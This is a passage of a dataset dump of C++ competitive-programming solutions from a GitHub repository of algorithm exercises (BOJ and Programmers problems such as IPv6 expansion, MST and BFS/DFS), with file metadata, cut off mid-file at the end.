0.40740740299224854, "avg_line_length": 14.8695650100708, "blob_id": "32fb1596f5ac7d8516dbb33ea74337199156d732", "content_id": "cd971e38d7c61ea2362e791486cf496b570fd37e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 741, "license_type": "no_license", "max_line_length": 58, "num_lines": 46, "path": "/BOJ/Implementation/17413.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 17413번: 단어 뒤집기 2\nDATE: 2022-06-06\n*/\n#include <iostream>\n#include <stack>\nusing namespace std;\n\nstack<char> s;\n\nvoid print(){\n while(!s.empty()){\n cout << s.top();\n s.pop();\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n bool flag = false;\n\n getline(cin, str);\n\n for(auto i : str){\n if(i == '<'){\n print();\n cout << i;\n flag = true;\n }\n else if(i == '>'){\n cout << i;\n flag = false;\n }\n else if(flag) cout << i;\n else if(i == ' ') {\n print();\n cout << \" \";\n }\n else s.push(i);\n }\n\n print();\n\n return 0;\n}" }, { "alpha_fraction": 0.3900589644908905, "alphanum_fraction": 0.42291492223739624, "avg_line_length": 23.75, "blob_id": "8f8ca213082d223aec82facccc76480750dd07dd", "content_id": "6f4110595ad2e621b1e765ca6320ba9731bd6af7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1199, "license_type": "no_license", "max_line_length": 71, "num_lines": 48, "path": "/programmers/Level 2/take_a_group_photo.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 단체사진 찍기\n2017 KAKAO CODE\nDATE: 2021-05-24\nUPDATE: 2022-03-26\n*/\n#include <vector>\n#include <algorithm>\n#include <string>\nusing namespace std;\n\nint solution(int n, vector<string> data) {\n int answer = 0;\n string str = \"ACFJMNRT\";\n\n do{\n bool flag = true;\n \n for(int i = 0 ; i < data.size() ; i++){\n char ch1 = data[i][0];\n char ch2 = data[i][2];\n \n int idx1 = find(str.begin(), str.end(), ch1) - str.begin();\n int idx2 = find(str.begin(), str.end(), ch2) - str.begin();\n \n int diff = abs(idx1 - idx2) - 1;\n int value = data[i][4] - '0';\n \n if(data[i][3] == '=' && diff != value){\n flag = false;\n break;\n }\n else if(data[i][3] == '>' && diff <= value){\n flag = false;\n break;\n }\n else if(data[i][3] == '<' && diff >= value){\n flag = false;\n break;\n }\n }\n \n if(flag) answer++;\n }\n while(next_permutation(str.begin(), str.end()));\n \n return answer;\n}" }, { "alpha_fraction": 0.47917962074279785, "alphanum_fraction": 0.5021752715110779, "avg_line_length": 23.029850006103516, "blob_id": "13db28ff83c21995f29018e0ce4cd76007b31559", "content_id": "e59d06cea86f52b748a9df94df26743c1e5592ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1659, "license_type": "no_license", "max_line_length": 83, "num_lines": 67, "path": "/BOJ/Implementation/3107.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ: 3107번: IPv6\n2021-12-28\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <string>\nusing namespace std;\n\nbool flag = false;\n\nvector<string> split(string str, string delimiter) {\n vector<string> result;\n size_t prev = 0, cur = str.find(delimiter);\n\n while(cur != string::npos) // find는 원하는 문자열을 찾지 못하면 npos를 반환한다.\n {\n \tstring sub_str = str.substr(prev, cur - prev); // 문자열 split\n result.push_back(sub_str);\n prev = cur + 1;\n cur = str.find(delimiter, prev);\n }\n result.push_back(str.substr(prev, cur - prev)); // 마지막 split\n\n if(str.find(\"::\") != string::npos) flag = true;\n\n return result;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str, ans;\n cin >> str;\n\n vector<string> result = split(str, \":\");\n vector<string> answer, tmp;\n\n if(result.size() != 8) {\n for(int i = 0 ; i < result.size() ; i++) {\n if(result[i].length() == 0 && flag) {\n for(int j = 0 ; j < 9 - result.size() ; j++) tmp.push_back(\"0000\");\n flag = false;\n }\n else tmp.push_back(result[i]);\n }\n\n result = tmp;\n }\n \n for(int i = 0 ; i < 8 ; i++) {\n if(result[i].length() < 4) {\n string tmp;\n\n for(int j = 0 ; j < 4 - result[i].length() ; j++) tmp += '0';\n tmp += result[i];\n\n answer.push_back(tmp);\n }\n else answer.push_back(result[i]);\n }\n \n for(int i = 0 ; i < 8 ; i++) ans += i == 7 ? answer[i] : answer[i] + \":\";\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4956217110157013, "alphanum_fraction": 0.5306479930877686, "avg_line_length": 15.342857360839844, "blob_id": "604dec291e0033d15d0c8a1c968eabba4f39df8c", "content_id": "b6f0dc3fa5ff56712e3f4838135fe91e584aef62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 581, "license_type": "no_license", "max_line_length": 84, "num_lines": 35, "path": "/BOJ/Implementation/11286.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "WINDOWS-1252", "text": "/*\nBOJ 11286¹ø: Àý´ñ°ª Èü\nDATE: 2021-01-07\n*/\n#include <iostream>\n#include <stdlib.h>\n#include <queue>\n#include <utility>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0);\n\tcin.tie(0);\n\tint n, x;\n\tpriority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> pq;\n\t\n\tcin >> n;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tcin >> x;\n\t\tint abs_x = abs(x);\n\n\t\tif (x != 0) {\n\t\t\tpq.push(make_pair(abs_x, x));\n\t\t}\n\t\telse if (x == 0) {\n\t\t\tif (pq.empty()) {\n\t\t\t\tcout << 0 << \"\\n\";\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tcout << pq.top().second << \"\\n\";\n\t\t\tpq.pop();\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.3082595765590668, "alphanum_fraction": 0.34365782141685486, "avg_line_length": 17.86111068725586, "blob_id": "a7be29d8879b39d91f3ea18fc3a39bc8b539ece3", "content_id": "92345999678df3f16407504c48bc5a7f694ba14d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 690, "license_type": "no_license", "max_line_length": 47, "num_lines": 36, "path": "/BOJ/Brute Force/2309.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2309번: 일곱 난쟁이\n2021-05-18\nBrute Force\n*/\n#include <iostream>\n#include <algorithm>\n#define n 9\nusing namespace std;\n\nint main(){\n int arr[n], sum=0;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n sum += arr[i];\n }\n\n sort(arr, arr+n);\n\n for(int i = 0 ; i < n - 1 ; i++){\n for(int j = i + 1 ; j < n ; j++){\n if(sum - arr[i] - arr[j] == 100){\n for(int k = 0 ; k < n ; k++){\n if(i == k || j == k)\n continue;\n else\n cout << arr[k] << '\\n';\n }\n return 0;\n }\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3926829397678375, "alphanum_fraction": 0.43658536672592163, "avg_line_length": 16.84782600402832, "blob_id": "610b0ff506db6bd7ee187287194b3d483a5dda07", "content_id": "e7750c88234a08bf47611ffb70c1453202154ec7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 834, "license_type": "no_license", "max_line_length": 61, "num_lines": 46, "path": "/BOJ/Binary Search/16401.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16401번: 과자 나눠주기\nDATE: 2022-06-04\nBinary Search\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nlong long arr[1000000];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long m, n, sum = 0;\n long long start, mid, end, cnt;\n long long ans = -1;\n\n cin >> m >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n sum += arr[i];\n }\n\n start = 0;\n end = sum;\n\n while(start <= end){\n cnt = 0;\n mid = (start + end) / 2;\n \n for(int i = 0 ; i < n ; i++){\n if(arr[i] >= mid && mid > 0) cnt += arr[i] / mid;\n }\n\n if(cnt >= m) {\n start = mid + 1;\n ans = max(ans, mid);\n }\n else end = mid - 1;\n }\n\n cout << (ans == -1 ? 0 : ans);\n\n return 0;\n}" }, { "alpha_fraction": 0.47205883264541626, "alphanum_fraction": 0.5014705657958984, "avg_line_length": 19.02941131591797, "blob_id": "cc740af8010f4e460d913ad4b9e3471e19f34a4a", "content_id": "9dcbe654943dd82725ffdce777a7dc18e0de26b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 752, "license_type": "no_license", "max_line_length": 89, "num_lines": 34, "path": "/BOJ/Binary Search/10816.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10816번: 숫자 카드 2 \n2021-12-19\n*/\n#include <iostream>\n#include <algorithm>\n#include <vector>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> v, ans;\n int n, m, num;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n v.push_back(num);\n }\n \n sort(v.begin(), v.end());\n\n cin >> m;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> num;\n auto upper = upper_bound(v.begin(), v.end(), num); // 처음으로 value값을 초과하는 원소의 주소\n auto lower = lower_bound(v.begin(), v.end(), num); // value값 보다 크거나 같은 첫번째 원소의 주소\n\n cout << upper - lower << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.48110830783843994, "alphanum_fraction": 0.513853907585144, "avg_line_length": 14.920000076293945, "blob_id": "a0ecea6ea3ff0a06a627e60c42b1b8e46ee1a0a3", "content_id": "aa851e9b106db1c874605c3ee8cfc965b0a59fdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 401, "license_type": "no_license", "max_line_length": 46, "num_lines": 25, "path": "/programmers/Level 2/carpet.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 카펫\n2021-12-27\n*/\n#include <string>\n#include <vector>\n\nusing namespace std;\n\nvector<int> solution(int brown, int yellow) {\n vector<int> answer;\n int h = 3, w;\n \n while(1) {\n w = (brown + yellow) / h;\n \n if((h - 2) * (w - 2) == yellow) break;\n h++;\n }\n \n answer.push_back(w);\n answer.push_back(h);\n \n return answer;\n}" }, { "alpha_fraction": 0.3636363744735718, "alphanum_fraction": 0.44727271795272827, "avg_line_length": 17.366666793823242, "blob_id": "3b9280052cf853e8920592923cd4352c3862813d", "content_id": "2155f1a194b6decd97125c16430e05a3df7e2ddb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 564, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Dynamic Programming/1003.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1003번: 피보나치 함수\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int cnt0[41]={0,}, cnt1[41]={0,};\n int tc;\n cin >> tc;\n\n cnt0[0] = 1;\n cnt1[1] = 1;\n\n for(int i = 2 ; i <= 40 ; i++){\n cnt0[i] = cnt0[i - 2] + cnt0[i - 1];\n cnt1[i] = cnt1[i - 2] + cnt1[i - 1];\n }\n\n for(int i = 0 ; i < tc ; i++){\n int n;\n cin >> n;\n cout << cnt0[n] << \" \" << cnt1[n] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.48469093441963196, "alphanum_fraction": 0.5049104690551758, "avg_line_length": 20.92405128479004, "blob_id": "cfe27d97df84310cd30130c60b8b469b30df886a", "content_id": "578c68dbd06201988743ce22be491bd23c995643", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1741, "license_type": "no_license", "max_line_length": 99, "num_lines": 79, "path": "/BOJ/MST/2887.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2887번: 행성 터널\n2022-01-04\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 100001\nusing namespace std;\n\nvector<pair<int,int>> c_x, c_y, c_z;\nvector<pair<int, pair<int,int>>> edge;\nint parent[MAX];\n\nint getParent(int x){\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nvoid unionParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n int x, y, z;\n int ans = 0;\n cin >> n;\n\n vector<int> c(n);\n\n for(int i = 0 ; i < n ; i++) {\n cin >> x >> y >> z;\n c_x.push_back({x, i});\n c_y.push_back({y, i});\n c_z.push_back({z, i});\n }\n\n sort(c_x.begin(), c_x.end());\n sort(c_y.begin(), c_y.end());\n sort(c_z.begin(), c_z.end());\n\n for(int i = 1 ; i < n ; i++) {\n edge.push_back({abs(c_x[i - 1].first - c_x[i].first), {c_x[i - 1].second, c_x[i].second}});\n edge.push_back({abs(c_y[i - 1].first - c_y[i].first), {c_y[i - 1].second, c_y[i].second}});\n edge.push_back({abs(c_z[i - 1].first - c_z[i].first), {c_z[i - 1].second, c_z[i].second}});\n }\n\n sort(edge.begin(), edge.end());\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < edge.size() ; i++) {\n int a = edge[i].second.first;\n int b = edge[i].second.second;\n int c = edge[i].first;\n\n if(findParent(a, b)) continue;\n unionParent(a, b);\n ans += c;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4395604431629181, "alphanum_fraction": 0.4769230782985687, "avg_line_length": 20.690475463867188, "blob_id": "fa5354db9cc7d048bb29a145dd831f4e67b77ebf", "content_id": "a3a92d2553b418bc36110956914e6942a50aaf18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 918, "license_type": "no_license", "max_line_length": 66, "num_lines": 42, "path": "/programmers/Level 2/function_development.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 2: 기능개발\n//2021-10-05\n#include <queue>\n#include <vector>\n#include <iostream>\nusing namespace std;\n\nvector<int> solution(vector<int> progresses, vector<int> speeds) {\n vector<int> answer;\n queue<int> q;\n \n for(int i = 0 ; i < progresses.size() ; i++) {\n if((100 - progresses[i]) % speeds[i] == 0) \n q.push((100 - progresses[i]) / speeds[i]);\n else q.push((100 - progresses[i]) / speeds[i] + 1);\n }\n \n while(!q.empty()) {\n int cnt = 1;\n int cur = q.front();\n q.pop();\n \n while(cur >= q.front() && !q.empty()) {\n q.pop();\n cnt++;\n }\n \n answer.push_back(cnt);\n }\n \n return answer;\n}\n\nint main() {\n vector<int> answer = solution({93, 30, 55}, {1, 30, 5});\n\n for(int i = 0 ; i < answer.size() ; i++) {\n cout << answer[i] << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3855970799922943, "alphanum_fraction": 0.4175022840499878, "avg_line_length": 15.89230728149414, "blob_id": "3319a946283504ac11b3ce5b66857269cb9bf626", "content_id": "27e199fc1356a01be45a36168e667311c0ba2724", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1113, "license_type": "no_license", "max_line_length": 58, "num_lines": 65, "path": "/BOJ/BFS_DFS/11724.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11724번: 연결 요소의 개수\nDATE: 2021-05-25\nDFS, BFS\n*/\n#include <iostream>\n#include <queue>\n#define MAX 1001\nusing namespace std;\n\nint n, m, cnt=0;\nint arr[MAX][MAX];\nbool visited[MAX];\n\nvoid bfs(int num){\n queue<int> q;\n visited[num] = true;\n q.push(num);\n\n while(!q.empty()){\n int front = q.front();\n q.pop();\n\n for(int i = 1 ; i <= n ; i++){\n if(arr[front][i] && !visited[i]){\n visited[i] = true;\n q.push(i);\n }\n }\n }\n}\n\nvoid dfs(int num){\n visited[num] = true;\n\n for(int i = 1 ; i <= n ; i++){\n if(arr[num][i] && !visited[i]){\n dfs(i);\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 0 ; i < m ; i++){\n int num1, num2;\n cin >> num1 >> num2;\n arr[num1][num2] = arr[num2][num1] = 1;\n }\n\n for(int j = 1 ; j <= n ; j++){\n if(!visited[j]){\n cnt++;\n bfs(j);\n //or\n //dfs(j);\n }\n }\n\n cout << cnt;\n\n return 0;\n}" }, { "alpha_fraction": 0.3388111889362335, "alphanum_fraction": 0.36818182468414307, "avg_line_length": 22.45081901550293, "blob_id": "4beb8cf3f7062a0bd0e92d9da1cc41a920bfcc78", "content_id": "0f88b0085a1b32263e940e9e0cdfb0fdf61a4f42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2870, "license_type": "no_license", "max_line_length": 58, "num_lines": 122, "path": "/BOJ/Implementation/14891.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 14891번: 톱니바퀴\n//2021-07-12\n#include <iostream>\n#include <vector>\n#include <math.h>\nusing namespace std;\n\nvector<int> number, direction;\nint arr[4][8];\nint k, ans=0;\n\nvoid turn_gear(int gear, int turn){\n if(turn == 1){ //Clockwise\n int tmp = arr[gear][7];\n\n for(int j = 6 ; j >= 0 ; j--){\n arr[gear][j+1] = arr[gear][j];\n }\n\n arr[gear][0] = tmp;\n }\n else if(turn == -1){ //Counterclockwise\n int tmp = arr[gear][0];\n\n for(int j = 1 ; j < 8 ; j++){\n arr[gear][j-1] = arr[gear][j];\n }\n\n arr[gear][7] = tmp;\n }\n}\n\nvoid solve(){\n for(int i = 0 ; i < number.size() ; i++){\n vector<pair<int,int>> v;\n int gear = number[i] - 1;\n int turn = direction[i], next_turn = -turn;\n\n if(gear == 0){\n for(int j = 1 ; j < 4 ; j++){\n if(arr[j-1][2] == arr[j][6]) break;\n else{\n v.push_back(make_pair(j, next_turn));\n next_turn = -next_turn;\n }\n }\n }\n else if(gear == 1){\n if(arr[0][2] != arr[gear][6]){\n turn_gear(0, next_turn);\n }\n for(int j = 2 ; j < 4 ; j++){\n if(arr[j-1][2] == arr[j][6]) break;\n else{\n v.push_back(make_pair(j, next_turn));\n next_turn = -next_turn;\n }\n }\n }\n else if(gear == 2){\n if(arr[gear][2] != arr[3][6]){\n turn_gear(3, next_turn);\n }\n for(int j = 1 ; j >= 0 ; j--){\n if(arr[j+1][6] == arr[j][2]) break;\n else{\n v.push_back(make_pair(j, next_turn));\n next_turn = -next_turn;\n }\n }\n \n }\n else if(gear == 3){\n for(int j = 2 ; j >= 0 ; j--){\n if(arr[j+1][6] == arr[j][2]) break;\n else{\n v.push_back(make_pair(j, next_turn));\n next_turn = -next_turn;\n }\n }\n }\n\n turn_gear(gear, turn);\n\n for(int j = 0 ; j < v.size() ; j++){\n turn_gear(v[j].first, v[j].second);\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n for(int i = 0 ; i < 4 ; i++){\n string str;\n cin >> str;\n for(int j = 0 ; j < 8 ; j++){\n arr[i][j] = str[j] - '0';\n }\n }\n\n cin >> k;\n\n for(int i = 0 ; i < k ; i++){\n int num1, num2;\n cin >> num1 >> num2;\n\n number.push_back(num1);\n direction.push_back(num2);\n }\n\n solve();\n\n for(int i = 0 ; i < 4 ; i++){\n if(arr[i][0] == 1) {\n ans += pow(2, i);\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.3627311587333679, "alphanum_fraction": 0.4068278670310974, "avg_line_length": 23.258621215820312, "blob_id": "c5077c4d8d357594cec8c6275ec3fc0d6e2260b0", "content_id": "f977c1a7122e93ff8b8e32764ec6906d5618d7a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1436, "license_type": "no_license", "max_line_length": 93, "num_lines": 58, "path": "/BOJ/Implementation/7682.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 7682번: 틱택토\nDATE: 2022-04-15\n*/\n#include <iostream>\nusing namespace std;\n\nchar arr[3][3];\n\nbool checkWin(string str, char win){\n // 가로 \n for(int i = 0 ; i < 3 ; i++){\n if(arr[i][0] == win && arr[i][0] == arr[i][1] && arr[i][1] == arr[i][2]) return true;\n }\n\n // 세로\n for(int i = 0 ; i < 3 ; i++){\n if(arr[0][i] == win && arr[0][i] == arr[1][i] && arr[1][i] == arr[2][i]) return true;\n }\n\n // 대각선\n if(arr[0][0] == win && arr[0][0] == arr[1][1] && arr[1][1] == arr[2][2]) return true;\n if(arr[0][2] == win && arr[0][2] == arr[1][1] && arr[1][1] == arr[2][0]) return true;\n\n return false;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n\n while(1){\n cin >> str;\n\n if(str == \"end\") break;\n\n int X = 0, O = 0;\n\n for(int i = 0 ; i < 9 ; i++) {\n if(str[i] == 'X') X++;\n else if(str[i] == 'O') O++;\n arr[i / 3][i % 3] = str[i];\n }\n\n if(X == O + 1 && checkWin(str, 'X') && !checkWin(str, 'O')) { // X 승\n cout << \"valid\\n\";\n }\n else if(X == O && checkWin(str, 'O') && !checkWin(str, 'X')){ // O 승\n cout << \"valid\\n\";\n }\n else if(X == 5 && O == 4 && !checkWin(str, 'X') && !checkWin(str, 'O')){ // 비김\n cout << \"valid\\n\";\n }\n else cout << \"invalid\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4985451102256775, "alphanum_fraction": 0.5266731381416321, "avg_line_length": 19.235294342041016, "blob_id": "e89f2686637754079a4be8267a14c42eae2db8a3", "content_id": "a3a7c717188f3f941587a3800752f58cb9837c13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 68, "num_lines": 51, "path": "/BOJ/BFS_DFS/1967.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1967번: 트리의 지름\nDATE: 2021-01-21\n*/\n#include <iostream>\n#include <vector>\n#include <string.h>\n#define NODE 10001\n\nusing namespace std;\n\nbool visited[NODE] = { false, };\nint n, next_node, diameter = 0;\nvector<pair <int, int>> tree[NODE];\n\nvoid dfs(int node, int weight) {\n if(weight > diameter){\n diameter = weight;\n next_node = node;\n }\n\n for (int i = 0; i < tree[node].size(); i++) {\n if (!visited[tree[node][i].first]) {\n visited[tree[node][i].first] = true;\n dfs(tree[node][i].first, weight + tree[node][i].second);\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n cin >> n;\n\n for (int i = 1; i <= n - 1; i++) {\n int p, c, w;\n cin >> p >> c >> w;\n tree[p].push_back(make_pair(c, w));\n tree[c].push_back(make_pair(p, w));\n }\n\n visited[1] = true;\n dfs(1, 0);\n\n memset(visited, false, NODE);\n visited[next_node] = true;\n dfs(next_node, 0);\n\n cout << diameter;\n return 0;\n}" }, { "alpha_fraction": 0.40514469146728516, "alphanum_fraction": 0.4662379324436188, "avg_line_length": 15.421052932739258, "blob_id": "855f35368d3d687df59967ef0297e7809f8f2b51", "content_id": "f64667a40e14f16c51bbe3898f0a89139adebbd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 319, "license_type": "no_license", "max_line_length": 58, "num_lines": 19, "path": "/BOJ/Implementation/2440.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2440번: 별 찍기 - 3\nDATE: 2022-02-13\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n for(int i = n ; i > 0 ; i--){\n for(int j = 0 ; j < i ; j++) cout << \"*\";\n cout << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3207964599132538, "alphanum_fraction": 0.3620944023132324, "avg_line_length": 18.955883026123047, "blob_id": "817d3488a99093f5426a0ee42f83ca1d9cf53c51", "content_id": "676ad883c1b56be3839829440dc632e36317bbb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1366, "license_type": "no_license", "max_line_length": 107, "num_lines": 68, "path": "/BOJ/BFS_DFS/10026.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10026번: 적록색약\nDATE: 2021-10-14\nDFS\n*/\n#include <iostream>\n#include <cstring>\nusing namespace std;\n\nchar arr[100][100];\nint visited[100][100] = {0, };\nint n;\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\n\nvoid dfs(int x, int y) {\n visited[x][y] = 1;\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= n || visited[nx][ny] || arr[nx][ny] != arr[x][y]) continue;\n dfs(nx, ny);\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int cnt = 0, cnt_rg = 0;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n cin >> arr[i][j];\n }\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n if(!visited[i][j]){\n dfs(i, j);\n cnt++;\n }\n }\n }\n\n memset(visited, 0, sizeof(visited));\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n if(arr[i][j] == 'R') arr[i][j] = 'G';\n }\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < n ; j++) {\n if(!visited[i][j]){\n dfs(i, j);\n cnt_rg++;\n }\n }\n }\n \n cout << cnt << \" \" << cnt_rg << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.3856613039970398, "alphanum_fraction": 0.4128553867340088, "avg_line_length": 18.7560977935791, "blob_id": "b44a9b4c1bc315bbca3305816f611d248fdea088", "content_id": "08153dded87f910ac5aa43933c80601e77a8f0bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 817, "license_type": "no_license", "max_line_length": 62, "num_lines": 41, "path": "/BOJ/Binary Search/2776.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2776번: 암기왕\n2021-12-19\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n vector<int> v;\n int tc, n, m, num;\n cin >> tc;\n\n for(int i = 0 ; i < tc ; i++) {\n v.clear(); \n cin >> n;\n \n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n v.push_back(num);\n }\n\n sort(v.begin(), v.end());\n\n cin >> m;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> num;\n \n auto upper = upper_bound(v.begin(), v.end(), num);\n auto lower = lower_bound(v.begin(), v.end(), num);\n\n if(upper - lower > 0) cout << 1 << '\\n';\n else cout << 0 << '\\n';\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4242236018180847, "alphanum_fraction": 0.45279502868652344, "avg_line_length": 22.014286041259766, "blob_id": "25bebdcd28fdfd9f2001b500608d495f25f12bdd", "content_id": "8f5e87415db494dca337a840eb25e12ff0245b49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1624, "license_type": "no_license", "max_line_length": 130, "num_lines": 70, "path": "/programmers/Level 1/recommend_new_id.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1 : 신규 아이디 추천\n//2021 KAKAO BLIND RECRUITMENT\n//2021-09-20\n#include <string>\n#include <cctype>\n#include <iostream>\n\nusing namespace std;\n\nstring solution(string new_id) {\n string tmp;\n \n //step 1\n for(int i = 0 ; i < new_id.length() ; i++) {\n if(isupper(new_id[i])) {\n new_id[i] = tolower(new_id[i]);\n }\n }\n \n //step 2\n for(int i = 0 ; i < new_id.length() ; i++) {\n if(islower(new_id[i]) || isdigit(new_id[i]) || new_id[i] == '-' || new_id[i] == '_' || new_id[i] == '.') tmp += new_id[i];\n }\n \n new_id = tmp;\n tmp.clear();\n \n //step 3\n for(int i = 0 ; i < new_id.length() ; i++) {\n if(new_id[i] == '.') {\n if(new_id[i - 1] != '.') tmp += new_id[i];\n }\n else tmp += new_id[i];\n }\n \n new_id = tmp;\n tmp.clear();\n \n //step 4\n for(int i = 0 ; i < new_id.length() ; i++) {\n if(new_id[0] == '.') new_id = new_id.substr(1, new_id.length() - 1);\n if(new_id[new_id.length() - 1] == '.') new_id = new_id.substr(0, new_id.length() - 1);\n }\n \n //step 5\n if(new_id.length() == 0) new_id = 'a';\n \n //step 6\n if(new_id.length() > 15) {\n new_id = new_id.substr(0, 15);\n if(new_id[14] == '.') new_id = new_id.substr(0, 14);\n }\n \n //step 7\n if(new_id.length() < 3){\n char ch = new_id[new_id.length() - 1];\n 